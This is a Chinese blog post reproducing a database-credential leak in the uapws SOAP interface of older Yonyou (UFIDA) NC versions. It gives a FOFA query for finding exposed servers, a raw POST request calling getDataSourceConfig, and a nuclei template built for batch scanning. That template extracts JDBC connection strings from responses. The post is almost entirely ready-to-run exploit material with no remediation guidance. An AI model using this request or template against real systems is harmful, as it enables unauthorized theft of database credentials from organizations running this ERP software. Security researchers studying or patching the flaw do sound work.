用友NC uapws接口老版本存在数据库账号密码泄露
漏洞复现
fofa语法:app="用友-UFIDA-NC"
POC:
POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
<soapenv:Header/>
<soapenv:Body>
<por:getDataSourceConfig/>
</soapenv:Body>
</soapenv:Envelope>
nuclei批量yaml文件
id: yonyou_NC-uapws-database-read
info:
name: yonyou_NC-uapws-database-read
author: nigori
severity: high
description: fofa app="用友-UFIDA-NC"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: yonyou,nc,oa,bjxsec
requests:
- raw:
- |
POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
<soapenv:Header/>
<soapenv:Body>
<por:getDataSourceConfig/>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "jdbc"
part: body
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '(jdbc:.+\:\d{1,5}\:\w+)'
分类:
漏洞复现 / 用友
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效